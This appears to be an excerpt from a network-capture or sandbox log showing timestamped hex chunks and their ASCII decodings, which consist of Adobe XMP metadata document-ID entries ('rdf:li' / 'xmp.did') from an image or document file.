                                                                                                                                                                                    2023-01-05 07:58:11 UTC7914INData Raw: 32 41 41 43 37 44 35 44 34 45 39 32 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 42 46 34 41 35 34 43 35 45 39 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 43 30 35 32 46 46 42 33 37 32 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 43 34 41 33 41 45 46 32 37 31 43 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 32 32 41 44 36 33 31 43 42 41 41 45 38 43 39 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: 2AAC7D5D4E92A8</rdf:li> <rdf:li>xmp.did:0280117407206811822ABF4A54C5E908</rdf:li> <rdf:li>xmp.did:0280117407206811822AC052FFB372EB</rdf:li> <rdf:li>xmp.did:0280117407206811822AC4A3AEF271C5</rdf:li> <rdf:li>xmp.did:0280117407206811822AD631CBAAE8C9</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7930INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 38 43 36 38 43 37 34 36 30 30 39 30 43 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 39 39 39 44 32 36 44 39 44 46 44 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 42 32 30 45 33 44 41 45 37 39 37 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 42 42 34 46 32 43 42 43 34 35 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30
                                                                                                                                                                                    Data Ascii: f:li> <rdf:li>xmp.did:068011740720681188C68C7460090C9A</rdf:li> <rdf:li>xmp.did:06801174072068118A6D999D26D9DFD0</rdf:li> <rdf:li>xmp.did:06801174072068118A6DB20E3DAE7970</rdf:li> <rdf:li>xmp.did:06801174072068118A6DBB4F2CBC450E</rdf:li> <rdf:li>xmp.did:0
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7938INData Raw: 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 38 38 64 35 65 38 37 2d 36 64 64 61 2d 34 39 36 31 2d 39 38 65 32 2d 62 61 39 37 38 31 38 38 63 66 37 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 38 39 34 32 33 66 30 2d 66 35 30 61 2d 32 39 34 66 2d 39 34 38 32 2d 37 38 34 63 37 33 33 66 66 39 66 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 38 41 37 38 32 44 42 30 45 32 30 36 38 31 31 39 33 30 41 42 37 45 41 33 39 41 38 34 30 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 38 41 43 44 33 44 32 43 42 39 32 45 30 31 31 38 33 38 33 41 37 30 37 39 32 43 43 46 45 46 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66
                                                                                                                                                                                    Data Ascii: 6</rdf:li> <rdf:li>xmp.did:088d5e87-6dda-4961-98e2-ba978188cf77</rdf:li> <rdf:li>xmp.did:089423f0-f50a-294f-9482-784c733ff9fa</rdf:li> <rdf:li>xmp.did:08A782DB0E206811930AB7EA39A8405C</rdf:li> <rdf:li>xmp.did:08ACD3D2CB92E0118383A70792CCFEF7</rdf:li> <rdf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7954INData Raw: 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 36 35 45 46 45 33 34 33 31 32 30 36 38 31 31 38 38 43 36 41 42 44 44 36 41 45 37 31 35 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 36 36 34 65 63 63 65 2d 61 65 64 65 2d 38 39 34 38 2d 38 33 32 31 2d 32 37 63 66 64 30 37 61 33 63 64 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 36 36 38 63 37 66 33 2d 39 65 61 61 2d 34 62 61 34 2d 38 61 38 32 2d 36 34 31 35 30 34 38 36 30 66 35 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 36 37 31 37 34 65 37 2d 63 36 38 62 2d 34 66 37 35 2d 39 36 62 37 2d 31 39 36 61 33 30 33 62 31 65 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: /rdf:li> <rdf:li>xmp.did:165EFE343120681188C6ABDD6AE715D6</rdf:li> <rdf:li>xmp.did:1664ecce-aede-8948-8321-27cfd07a3cd9</rdf:li> <rdf:li>xmp.did:1668c7f3-9eaa-4ba4-8a82-641504860f55</rdf:li> <rdf:li>xmp.did:167174e7-c68b-4f75-96b7-196a303b1e96</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7970INData Raw: 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 36 34 30 31 42 32 31 37 44 32 38 36 38 31 31 38 43 31 34 41 46 39 44 32 37 33 35 41 34 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 36 34 41 38 39 43 37 35 39 32 33 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 36 36 31 36 64 38 39 2d 35 38 31 35 2d 34 33 63 32 2d 38 63 66 62 2d 63 34 38 31 34 62 36 39 64 33 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 36 36 38 42 39 34 31 42 35 32 35 36 38 31 31 38 32 32 41 46 44 38 45 36 43 42 44 39 38 43 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 36
                                                                                                                                                                                    Data Ascii: <rdf:li>xmp.did:26401B217D2868118C14AF9D2735A483</rdf:li> <rdf:li>xmp.did:264A89C759236811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:26616d89-5815-43c2-8cfb-c4814b69d383</rdf:li> <rdf:li>xmp.did:2668B941B5256811822AFD8E6CBD98C8</rdf:li> <rdf:li>xmp.did:26
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7977INData Raw: 33 43 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 46 34 42 30 42 34 36 32 45 37 45 45 31 31 31 38 39 30 42 38 34 43 42 44 43 33 33 37 39 32 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 46 35 31 43 32 42 42 34 31 32 30 36 38 31 31 39 34 42 31 46 43 38 36 30 43 39 42 36 36 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 46 35 33 44 43 46 43 33 39 46 39 31 31 45 35 41 35 42 39 43 31 37 39 34 41 31 38 33 34 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 46 35 45 36 38 32 33 43 34 32 30 36 38 31 31 38 41 36 44 39 39 30 33 46 36 36 44 38 35 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d
                                                                                                                                                                                    Data Ascii: 3CA</rdf:li> <rdf:li>xmp.did:2F4B0B462E7EE111890B84CBDC337927</rdf:li> <rdf:li>xmp.did:2F51C2BB4120681194B1FC860C9B662E</rdf:li> <rdf:li>xmp.did:2F53DCFC39F911E5A5B9C1794A18346F</rdf:li> <rdf:li>xmp.did:2F5E6823C42068118A6D9903F66D8554</rdf:li> <rdf:li>xm
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7993INData Raw: 38 44 42 31 45 31 31 45 30 39 33 36 44 43 38 32 38 45 41 38 37 45 42 45 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 43 37 34 39 32 32 39 30 38 32 30 36 38 31 31 42 36 39 36 38 30 43 41 35 35 30 31 44 35 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 43 39 31 35 42 45 43 43 31 39 32 45 30 31 31 41 37 44 38 42 34 45 41 33 43 43 44 39 31 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 43 39 38 38 35 39 44 44 30 32 30 36 38 31 31 41 37 42 41 44 42 32 42 33 46 46 34 43 35 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 43 41 32 36 30 31 31 43 41 37 34 45 31 31 31 41 37 31 44 42 36 33 34 34 32 31 43 33 30
                                                                                                                                                                                    Data Ascii: 8DB1E11E0936DC828EA87EBE3</rdf:li> <rdf:li>xmp.did:3C74922908206811B69680CA5501D5DB</rdf:li> <rdf:li>xmp.did:3C915BECC192E011A7D8B4EA3CCD9187</rdf:li> <rdf:li>xmp.did:3C98859DD0206811A7BADB2B3FF4C5DE</rdf:li> <rdf:li>xmp.did:3CA26011CA74E111A71DB634421C30
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8009INData Raw: 32 31 45 41 42 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 42 33 46 46 43 30 30 33 38 32 30 36 38 31 31 39 39 34 43 46 32 45 33 36 45 38 44 34 39 43 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 42 41 39 39 35 41 45 45 41 39 30 31 31 44 46 42 36 30 33 44 33 38 42 46 34 33 44 37 31 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 42 43 39 35 43 35 46 31 34 32 30 36 38 31 31 41 37 42 41 43 45 42 46 31 31 31 43 31 43 42 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 42 45 34 44 32 37 41 41 46 45 46 31 31 45 35 39 35 35 33 43 36 39 30 44 45 32 39 45 45 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: 21EAB0</rdf:li> <rdf:li>xmp.did:4B3FFC0038206811994CF2E36E8D49C2</rdf:li> <rdf:li>xmp.did:4BA995AEEA9011DFB603D38BF43D718F</rdf:li> <rdf:li>xmp.did:4BC95C5F14206811A7BACEBF111C1CB8</rdf:li> <rdf:li>xmp.did:4BE4D27AAFEF11E59553C690DE29EEEA</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8017INData Raw: 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 32 35 32 43 38 38 34 33 45 37 33 31 31 45 37 39 44 33 42 39 37 41 42 34 35 36 46 34 30 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 32 36 45 33 33 43 39 44 44 45 41 45 33 31 31 39 36 45 33 42 38 42 33 32 37 34 33 46 31 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 32 39 30 31 36 32 34 30 38 32 30 36 38 31 31 39 35 46 45 42 35 38 32 44 30 31 36 42 33 30 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 32 39 31 32 38 35 36 2d 64 65 34 63 2d 61 39 34 30 2d 62 35 63 31 2d 63 32 30 63 36 37 37 38 62 39 30 61 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: 2AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:5252C8843E7311E79D3B97AB456F4031</rdf:li> <rdf:li>xmp.did:526E33C9DDEAE31196E3B8B32743F1EE</rdf:li> <rdf:li>xmp.did:529016240820681195FEB582D016B30A</rdf:li> <rdf:li>xmp.did:52912856-de4c-a940-b5c1-c20c6778b90a</rdf
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8033INData Raw: 64 3a 36 32 34 35 41 35 41 37 37 34 32 33 36 38 31 31 39 39 34 43 41 30 45 36 41 42 31 43 31 35 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 32 34 39 30 39 44 33 44 36 32 30 36 38 31 31 38 35 44 44 38 37 33 32 41 41 41 44 34 37 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 32 34 45 31 44 33 31 30 43 32 30 36 38 31 31 38 37 31 46 44 41 31 36 41 45 31 42 44 33 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 32 36 61 66 39 37 61 2d 37 34 66 38 2d 64 39 34 63 2d 38 39 31 33 2d 30 39 32 66 61 36 66 64 34 32 39 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 32 37 36 46 35 33 36 31 35 32 34 36 38 31 31 39
                                                                                                                                                                                    Data Ascii: d:6245A5A774236811994CA0E6AB1C1578</rdf:li> <rdf:li>xmp.did:624909D3D620681185DD8732AAAD4752</rdf:li> <rdf:li>xmp.did:624E1D310C206811871FDA16AE1BD36B</rdf:li> <rdf:li>xmp.did:626af97a-74f8-d94c-8913-092fa6fd4294</rdf:li> <rdf:li>xmp.did:6276F536152468119
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8049INData Raw: 64 69 64 3a 37 30 46 45 39 42 46 35 44 34 32 30 36 38 31 31 38 43 31 34 41 33 36 45 35 36 36 45 31 32 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 30 61 66 34 30 39 36 2d 37 32 64 30 2d 34 39 31 61 2d 39 37 34 31 2d 62 35 66 33 61 65 36 30 37 37 62 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 30 62 62 31 37 38 66 2d 62 31 36 30 2d 30 62 34 39 2d 61 31 37 34 2d 37 64 61 30 32 35 30 65 32 39 61 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 30 63 33 32 62 35 38 2d 63 33 63 66 2d 34 32 38 35 2d 62 30 61 33 2d 62 32 64 35 65 62 32 36 33 61 63 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 30 64 62 38 31 33
                                                                                                                                                                                    Data Ascii: did:70FE9BF5D42068118C14A36E566E12DA</rdf:li> <rdf:li>xmp.did:70af4096-72d0-491a-9741-b5f3ae6077be</rdf:li> <rdf:li>xmp.did:70bb178f-b160-0b49-a174-7da0250e29af</rdf:li> <rdf:li>xmp.did:70c32b58-c3cf-4285-b0a3-b2d5eb263acd</rdf:li> <rdf:li>xmp.did:70db813
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8057INData Raw: 64 69 64 3a 37 37 46 43 43 39 36 41 39 31 44 44 31 31 44 46 41 42 31 46 38 37 32 43 38 45 38 41 41 46 45 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 37 61 38 32 30 30 37 2d 34 30 64 33 2d 34 34 37 63 2d 62 64 63 38 2d 65 65 36 31 31 32 32 65 35 65 63 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 37 63 39 30 62 36 35 2d 33 64 35 33 2d 34 35 32 39 2d 38 37 63 62 2d 35 36 61 34 30 37 62 32 63 64 34 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 38 32 39 38 46 36 38 30 43 32 30 36 38 31 31 39 39 34 43 39 43 36 35 38 41 30 44 36 45 33 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 38 34 31 35 62 32 36 2d 33 64
                                                                                                                                                                                    Data Ascii: did:77FCC96A91DD11DFAB1F872C8E8AAFE4</rdf:li> <rdf:li>xmp.did:77a82007-40d3-447c-bdc8-ee61122e5ec8</rdf:li> <rdf:li>xmp.did:77c90b65-3d53-4529-87cb-56a407b2cd4b</rdf:li> <rdf:li>xmp.did:78298F680C206811994C9C658A0D6E3E</rdf:li> <rdf:li>xmp.did:78415b26-3d
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8073INData Raw: 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 37 61 65 64 34 36 34 2d 62 35 37 66 2d 39 61 34 35 2d 61 37 65 30 2d 33 38 62 34 38 66 36 38 37 33 33 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 38 30 30 65 31 34 32 2d 61 35 66 35 2d 34 35 30 34 2d 39 37 38 63 2d 31 63 36 61 66 32 36 38 34 65 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 38 30 32 45 34 38 37 34 44 32 30 36 38 31 31 41 37 42 41 41 39 46 39 34 38 41 33 39 46 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 38 30 42 32 44 44 45 46 44 39 44 45 31 31 31 41 44 44 32 39 42 36 38 34 45
                                                                                                                                                                                    Data Ascii: 0681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:87aed464-b57f-9a45-a7e0-38b48f68733d</rdf:li> <rdf:li>xmp.did:8800e142-a5f5-4504-978c-1c6af2684e68</rdf:li> <rdf:li>xmp.did:8802E4874D206811A7BAA9F948A39F42</rdf:li> <rdf:li>xmp.did:880B2DDEFD9DE111ADD29B684E
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8089INData Raw: 6d 70 2e 64 69 64 3a 39 35 32 46 42 44 38 42 34 33 32 31 36 38 31 31 42 36 43 38 39 31 43 38 45 30 42 37 37 43 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 35 34 45 33 45 43 30 31 43 32 30 36 38 31 31 38 44 42 42 42 32 43 45 35 44 36 43 34 32 30 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 35 34 63 61 31 64 30 2d 34 63 34 33 2d 34 33 62 35 2d 38 63 37 62 2d 61 62 39 39 34 34 65 65 30 61 35 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 35 35 41 36 38 42 45 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 35 36 34 63 30 35 64 2d 66 39 64
                                                                                                                                                                                    Data Ascii: mp.did:952FBD8B43216811B6C891C8E0B77C98</rdf:li> <rdf:li>xmp.did:954E3EC01C2068118DBBB2CE5D6C420A</rdf:li> <rdf:li>xmp.did:954ca1d0-4c43-43b5-8c7b-ab9944ee0a5f</rdf:li> <rdf:li>xmp.did:955A68BE0720681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:9564c05d-f9d
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8097INData Raw: 2e 64 69 64 3a 39 44 46 43 34 31 34 37 34 36 32 30 36 38 31 31 39 31 30 39 41 42 43 43 38 31 30 44 30 36 35 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 45 31 43 39 38 37 46 37 37 33 43 45 30 31 31 39 39 35 31 46 45 39 45 32 31 44 39 35 46 44 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 45 34 30 39 44 33 41 39 46 32 32 36 38 31 31 38 32 32 41 46 30 44 43 31 35 41 42 35 36 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 45 36 34 30 38 43 46 33 46 30 39 31 31 45 31 38 38 34 35 44 45 36 31 46 39 42 45 38 43 46 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 45 36 44 36 30 45 34 31 30 32 31 36 38 31 31 42 38
                                                                                                                                                                                    Data Ascii: .did:9DFC4147462068119109ABCC810D065A</rdf:li> <rdf:li>xmp.did:9E1C987F773CE0119951FE9E21D95FD2</rdf:li> <rdf:li>xmp.did:9E409D3A9F226811822AF0DC15AB56FB</rdf:li> <rdf:li>xmp.did:9E6408CF3F0911E18845DE61F9BE8CFD</rdf:li> <rdf:li>xmp.did:9E6D60E410216811B8
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8113INData Raw: 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 33 46 41 41 44 45 36 43 32 32 30 36 38 31 31 39 39 34 43 45 38 33 42 42 42 43 38 36 44 37 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 34 31 44 31 33 34 46 30 36 36 41 31 31 45 31 39 41 46 46 41 33 31 38 44 45 33 30 38 44 44 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 34 32 36 34 45 45 34 30 39 32 30 36 38 31 31 41 37 33 32 45 42 36 31 30 43 38 35 44 37 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 34 34 44 45 45 37 42 39 36 32 39 36 38 31 31 38 32 32 41 46 42 45 42 33 36 42 33 44 30 39 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 34 36 38 44 33 33 44
                                                                                                                                                                                    Data Ascii: rdf:li>xmp.did:B3FAADE6C2206811994CE83BBBC86D74</rdf:li> <rdf:li>xmp.did:B41D134F066A11E19AFFA318DE308DDF</rdf:li> <rdf:li>xmp.did:B4264EE409206811A732EB610C85D7A5</rdf:li> <rdf:li>xmp.did:B44DEE7B96296811822AFBEB36B3D090</rdf:li> <rdf:li>xmp.did:B468D33D
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8129INData Raw: 78 6d 70 2e 64 69 64 3a 43 43 35 38 46 36 39 44 30 37 32 30 36 38 31 31 38 41 36 44 44 34 46 43 43 36 35 36 43 35 42 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 43 36 33 45 46 39 44 30 39 32 30 36 38 31 31 38 41 37 35 46 34 37 34 35 38 30 44 43 44 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 43 39 38 30 30 45 33 37 32 32 31 36 38 31 31 38 32 32 41 44 45 32 30 44 45 43 41 34 39 42 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 43 41 39 36 38 37 42 42 39 46 36 45 33 31 31 42 42 35 34 41 44 39 42 31 43 39 33 41 43 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 43 41 45 45 41 46 42 41 45 32 30 36 38 31
                                                                                                                                                                                    Data Ascii: xmp.did:CC58F69D072068118A6DD4FCC656C5BC</rdf:li> <rdf:li>xmp.did:CC63EF9D092068118A75F474580DCD87</rdf:li> <rdf:li>xmp.did:CC9800E372216811822ADE20DECA49B6</rdf:li> <rdf:li>xmp.did:CCA9687BB9F6E311BB54AD9B1C93AC68</rdf:li> <rdf:li>xmp.did:CCAEEAFBAE20681
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8136INData Raw: 64 3a 44 35 36 35 35 35 34 37 34 39 34 42 45 31 31 31 39 42 30 34 45 46 38 34 32 46 35 36 30 33 39 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 35 37 33 44 34 30 32 30 42 32 30 36 38 31 31 38 30 38 33 38 43 33 30 35 44 43 41 39 45 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 35 38 33 38 38 41 31 44 43 32 31 45 31 31 31 38 42 37 46 42 32 37 34 44 41 46 45 32 42 31 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 35 39 34 30 37 42 44 30 41 32 30 36 38 31 31 38 30 38 33 42 46 44 39 41 39 46 38 31 37 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 35 39 43 42 46 44 42 37 37 31 43 44 46 31 31 39 35 37 34 44
                                                                                                                                                                                    Data Ascii: d:D5655547494BE1119B04EF842F56039F</rdf:li> <rdf:li>xmp.did:D573D4020B20681180838C305DCA9E89</rdf:li> <rdf:li>xmp.did:D58388A1DC21E1118B7FB274DAFE2B17</rdf:li> <rdf:li>xmp.did:D59407BD0A2068118083BFD9A9F81730</rdf:li> <rdf:li>xmp.did:D59CBFDB771CDF119574D
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8152INData Raw: 41 33 39 33 31 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 43 43 36 32 36 43 38 38 37 32 30 36 38 31 31 38 32 33 46 44 31 34 44 45 32 43 38 43 38 37 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 43 45 41 41 44 31 32 37 31 32 30 36 38 31 31 38 42 31 34 42 37 39 34 39 34 46 36 32 46 44 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 44 31 46 44 35 45 39 43 37 36 32 45 30 31 31 39 39 33 30 46 42 34 41 34 42 45 32 33 39 46 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 44 32 31 43 42 33 33 34 42 38 36 45 31 31 31 38 38 32 32 39 36 42 33 43 33 31 39 